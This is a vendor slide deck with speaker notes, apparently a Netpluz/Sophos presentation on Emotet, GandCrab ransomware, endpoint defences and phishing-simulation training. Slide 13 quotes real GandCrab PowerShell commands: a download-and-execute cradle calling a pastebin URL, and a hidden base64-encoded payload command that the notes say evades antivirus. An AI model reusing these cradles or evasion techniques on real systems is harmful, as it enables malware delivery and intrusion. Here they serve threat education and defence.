Netpluz - Managed Firewall & Endpoint Protection
â˘Als PPTX, PDF herunterladenâ˘
0 gefällt mirâ˘209 views
The document discusses various modern cyber threats like Emotet and ransomware, describing how Emotet spreads through malicious emails and payloads, evolves constantly, and aims to install ransomware or other malware on infected systems. It also outlines Sophos' defenses against Emotet through application control, web protection, and endpoint detection and response capabilities to detect and block malicious activity. The document concludes by discussing how phishing attacks have become the weakest link by targeting employees and Sophos' phishing security tool called Phish Threat to educate and test users through simulated phishing campaigns.
Empfohlen
Empfohlen
Weitere ähnliche Inhalte
Was ist angesagt?
Was ist angesagt? (20)
Ăhnlich wie Netpluz - Managed Firewall & Endpoint Protection
Ăhnlich wie Netpluz - Managed Firewall & Endpoint Protection (20)
Mehr von Netpluz Asia Pte Ltd
Mehr von Netpluz Asia Pte Ltd (20)
KĂźrzlich hochgeladen
KĂźrzlich hochgeladen (20)
Netpluz - Managed Firewall & Endpoint Protection
- 1. Lim Chee Keong Senior Security Solution Engineer May 2019 Ransomware and Modern Threats
- 2. What Weâre Going to Cover 2 ⢠Ransomware Playbook o What it is, what it does ⢠Understanding EMOTET ⢠Sophos EDR â Threat Hunting ⢠Phish Threat
- 3. 3
- 4. 4
- 5. EMOTET 5 2014 Banking Trojan âAmongst the most costly and destructive threats to U.S. businesses right nowâ U.S. Department for Homeland Security, 2018 2019 Crimeware-as-a-Service Constant evolution QakbotDridex IcedID RyukSandbox Evasion First Seen Upgraded Evasion ZBotTrickBot Occasional Attacks
- 6. Emotet payloads change constantly 375 388 343 414 208 393 338 270 179 214 125 248 751 119 129 0 100 200 300 400 500 600 700 800 # of unique Emotet payload executables seen by SophosLabs 300 new payload executables every day
- 7. Emotetâs Goals 7 Spread across network Skim email addresses and names Send spam to infect other organizations Download any malware payload(s) Be a smokescreen for targeted ransomware Steal browser histories, usernames and passwords Data breach Security breach Reputation damage Primary infection Secondary infection High Impact
- 8. DEFENDING AGAINST EMOTET WITH SOPHOS 8
- 9. An Emotet Attack 9 Your Network C & C Servers Target1. Infiltrate Cyber Criminal Spam email 2. Call Home Register Success Get Instructions and Payload B. Bot Attack Send spam to infect other orgs A. Steal Data Upload email addresses, user names and passwords 3. Spread Spread to other systems on the network C. Payload Install banking Trojan Install ransomware
- 10. Stop Emotet From Infecting your Endpoints 10
- 11. Anatomy of an Emotet Attack STAGE 1 User received a malicious email (malspam) STAGE 2 User clicks on a malicious attachment A document called ârgnr-avr111205-85.docâ 11 parent to parent to parentto Outlook 75 registry keys 1 IP Address 386 files rgnr-avr111205-85.doc Word cmd.exe 9 files PowerShell 45 registry keys Printer Driver Host 431.exe cmd.exe 431.exe 14 registry keys 2 files 89 files 431.exe STAGE 3 User enables malicious macros in the document STAGE 4 The macro uses cmd.exe (Command Prompt) to execute malicious, obfuscated code STAGE 5 cmd.exe launches a second copy of cmd.exe STAGE 6 This new instance of cmd.exe launches and executes PowerShell STAGE 7 PowerShell connects to an IP address and downloads a file called 431.exe STAGE 8 PowerShell executes 431.exe which, in turn, executes a second copy of itself STAGE 9 Intercept X detects PowerShell connecting to a suspect IP address and downloading an exe with unknown reputation, and blocks this behavior and identifies the root cause (Outlook).
- 12. Delivery Exploitation Installation Click xyz.com SFX *** Emotet Attack Chain APPLICATION CONTROL MALICIOUS TRAFFIC DETECTION WEB PROTECTION LOCAL PRIVILEGE MITIGATION DEEP LEARNING APPLICATION LOCKDOWN ANTI âEXPLOIT (CODE/MEMORY/APC ) MITIGATIONS HIPS THREAT CASE (RCA) & EDR RUNTIME HIPS CREDENTIAL THEFT PROTECTION ANTI-RANSOMWARE Command & Control Actions on Objective
- 13. Ransomware - GrandCrab "C:WindowsSysWOW64WindowsPower Shellv1.0powershell.exe" IEX ((new- object net.webclient).downloadstring('https://past ebin.com/raw/eCQtKD7T'));Invoke- WNFVAVRLWSQHZC;Start-Sleep -s 1000000; C:Windowssystem32WindowsPowerShellv1.0powershell.exe -nop -w hidden -e SQBmACgAJABFAE4AVgA6AFAAUgBPAEMARQBTAFMATwBSAF8AQQBSAEM ASABJAFQARQBDAâŚâŚâŚâŚ.
- 14. Security analysis: Cross-estate threat hunting
- 15. Security analysis: Automatically detect and prioritize threats using machine learning
- 16. The Changing Focus of Cyber Attacks Target systems, applications and networks with malicious content Target weakest link â the employees â with social engineering and deception Yesterday Today
- 17. Sophos Central Phish Threat Educate and test your users to spot attacks ⢠Over 140 attack templates using real threat intelligence TEST 1 ⢠Deliver over 30 interactive security training courses TRAIN 2 ⢠Campaign reporting ⢠Measure organization and individuals MEASURE 3 17
- 18. Attack Email Caught Email Training Enrollment Email Attack Landing Page Reminder Email Caught User Landing Page Training Landing Page PHISHING LINK CAMPAIGNS Lure an employee to click on a link in an email Phish Threat Campaigns ATTACHMENT CAMPAIGNS Simulate an attack involving a malicious Office attachment TRAINING CAMPAIGNS Enroll employees directly in training without simulation CREDENTIAL HARVESTING CAMPAIGNS Lure an employee into entering login credentials online Customizable content and branding
- 19. 19
- 20. Phish Threat Enhanced Reporting 20 Endpoint Email Web XG Firewall Dashboard Reports Campaigns PHISH THREAT
Hinweis der Redaktion
- Diving into the agenda for today: - Weâre going to start by looking at what Emotet is, how it works â weâve got the latest updates from Sophos Support and SophosLabs to share with you. -Weâll then look at how Sophos solutions help protect you against Emotet â weâre going to look holistically, at both the endpoint and the network level - Weâll explore what to do if you have the misfortune to be hit by Emotet - And finally weâll close out with the three best practice steps we recommend every organization follows to maximize their Emotet protection
- Emotet is a really sophisticated, really nasty worm. Indeed, the US Department of Homeland Security considers it amongst the most costly and destructive threats to US businesses right now. Not that it limits itself to the US â more of that in a moment Emotet is not a new piece of malware, but itâs one thatâs got steadily more complex and more destructive. We started seeing Emotet five years ago. It started off as a Trojan that silently stole banking credentials. Since then it has evolved into a highly sophisticated platform for distributing other kinds of malware. Itâs crimeware as a service Emotet serves up whatever malware pays. So far this year thatâs meant TrickBot and QBot banking Trojans, although itâs also been linked with BitPaymer â a strain of sophisticated ransomware that extorts six-figure payouts. The people behind Emotet are highly professional, financially motivated and theyâre constantly evolving their threat to make it more powerful and destructive.
- And when I say âconstantly evolvingâ I really mean it! One of the characteristics of Emotet is that its payloads change all the time. This graph here shows the number of new unique Emotet payload executables seen by SophosLabs in the last two weeks of January this year. As you can see, there are literally hundreds of versions every single day. In fact, on average, SophosLabs sees around 300 new unique payload executables every day, and saw almost four and a half thousand (4,494) unique payload executables in the last 15 days of January alone.
- So thatâs what Emotet is. Letâs take a look now at what Emotet does. Unfortunately the answer is âlots of thingsâ Once inside your computer, Emotet tries to: 1. Spread onto as many machines as possible. Itâs a worm so can spread without user interaction. It moves from one infected computer to another via the network. 2. Send malicious emails to infect other organizations 3. Download a malware payload. Traditionally the payloads have mostly been banking Trojans, with Trickbot the most prevalent. Its payload injects code into your browser to automatically debit your bank and PayPal accounts when you next login. 4. Some Emotet variants skim email addresses and names from email client data and archives, likely so they can be sold as part of a wider list and used to spread more malicious spam. 5. Others inspect your web browser, stealing histories and saved usernames and passwords. 6. To compound the pain, Emotet can also be a smokescreen for targeted ransomware attacks. While organizations are dealing with Emotet infections, ransomware like BitPaymer takes advantage of the distraction to hold the organizationâs data hostage. Emotetâs activities are hugely damaging for impacted organizations: - reputation damage from sending spam - a primary infection â often a banking Trojan that leads to $$$ loss - a data breach from email data loss â bringing in compliance / GDPR concerns - a security breach from the loss of user names and passwords And potentially a secondary infection â usually a ransomware attack, that tries to extort more $$$
- So thatâs how Emotet works, now lets look at how you can defend against it with Sophos.
- To understand how Sophos protects against Emotet we need to dive into the attack in some detail. As weâve seen, Emotet typically starts with a spam email with malicious attachment. Once into the network it will call home to let the hacker know itâs successful, and get updates, instructions and payloads It then spreads, and being a worm it can do this without user activity, although it does take advantage of unpatched vulnerabilities such as the EternalBlue exploit. Next, as weâve seen, it can carry out a range of unpleasant activities: Steal email addresses Steal browser histories, user names and passwords Send spam to infect other organizations Install banking Trojans Deliver ransomware Sophos protects against Emotet in multiple ways Block the attack from entering the network in the first place Stop Emotet from spreading to other parts of the network Prevent Emotet from calling home Stop Emotet from infecting your endpoints and installing banking Trojans or ransomware Block it from stealing sensitive data Stop Emotet from sending spam to infect other organizations Letâs have a look in more detailâŚ.
- Letâs start by looking at how Intercept X Advanced with EDR helps stop Emotet from infecting your customersâ endpoints.
- Letâs look at how Emotet works in a bit more detail with the help of this threat chain. This is a real case, from Sophos support, and weâre using the EDR capabilities in Intercept X to see whatâs happened here. We did have to disable some protections to see the full threat chain as usually this would have been stopped much sooner It starts with the user receiving a malicious email. The user then clicks on a malicious attachment And then the user enables malicious macros in the document. The macro uses CMD to execute obfuscated code CMD then launches a second copy of CMD That second copy launches Microsoft PowerShell PowerShell connects on an IP address and downloads a file called 431.exe PowerShell executes 431.exe Intercept X detects PowerShell connecting to a suspicious IP address and downloading an exe with unknown reputation, and blocks this behaviour, and identifies the root cause - Outlook
- Intercept X is packed with multiple layers of advanced technologies that provide sophisticated protection against Emotet. Thinking back to the threat chain we saw earlier Emotet: Started with a spam email with a link to a Word document including macros Word macro starts a PowerShell script, which connects to an IP address, and then downloads an .exe It then spreads across the network, taking advantage of exploits like Eternal Blue, and SMB shares, and escalating privileges It also communicates with the Command and Control servers to receive instructions and send back data And then it carries out itâs payload, which may be delivering a banking Trojan, stealing data, installing ransomware ⌠Intercept X technologies protect at every part of that attack chain. You need these multiple layers of protection to secure against such a fast-moving, sophisticated threat as Emotet. One area to particularly call out is the deep learning capabilities. The powerful AI technology in Intercept X enables it to predict threats that have never been seen before, which is essential for polymorphic malware like Emotet. We donât know what Emotet will look like next week, next month, but the predictive technologies can block threats that have never been seen before. Itâs youâre best possible future-proofing.
- The function scheduled to run in 1 million secondsâ time contains a full, base64 encoded copy of the GandCrab malware, which is loaded directly into memory by PowerShell. This technique is an attempt to dodge antivirus software by using a legitimate executable, PowerShell, and avoiding filesystem writes.
- For over 30 years Sophos has been delivering innovative, simple, and highly-effective cybersecurity solutions to IT professionals and the channel that serves them. And we understand that securing organisations today has a lot to do with educating employees around the cyber security threats they face Where as in the past attackers would target systems, applications, networks. Today they target often the weakest link in the organisations â Employees â with social engineering and deception
- Combine email security with simulated phishing attacks that allow you to test user awareness by emulating the tactics used by real phishing attackers, and couple that with training to educate end users so they know how to spot and stop the real thing. And perhaps most importantly measure progress and improvement to demonstrate ROI to the rest of the business. Phish Threat from Sophos does all three. With over 140 customizable attack templates fed by latest threat intelligence Over 30 interactive training courses covering a range security and compliance topics And comprehensive reporting. Allowing you to measure performance by campaign, individual user, and at an organizational level to measure susceptibility to attack.
- A range of customizable campaigns that mirror the tactics used in real phishing attacks. Phishing link campaign â where we are trying to lure a user to click a phishing link Credential harvesting â this time where we are sending users to a fake credential harvesting website to enter username and password details (donât worry, we donât store any data) Attachment campaigns â where we lure a use to open an attachment that could in the real word contain a malware downloader for instance And lastly a Training-only campaign â no simulated attack this time. You create your own branded email and attach training Each campaign style is fully customizable â from attack email, to training landing pages and training reminder emails. All templates and training is available in a choice of nine languages: English French German Italian Spanish Portguese Korean Traditional Chinese Japanese
- And combine that with how quickly users are reporting simulated phishing emails â allowing us to monitor behavior changing from knowing to doing â a really important distinction when combatting real cyber threats. Â And Iâll add this is one of a number of reports and dashboards providing insight in organizational, campaign and individual behavior.
- Well with the Outlook add-in for Phish Threat for enhanced reporting we can do just that. Allowing users to report malicious emails direct from the inbox and passing that data feed to Sophos Email, Endpoint and web security products through SophosLabs. Â And also surface that data in Sophos Central.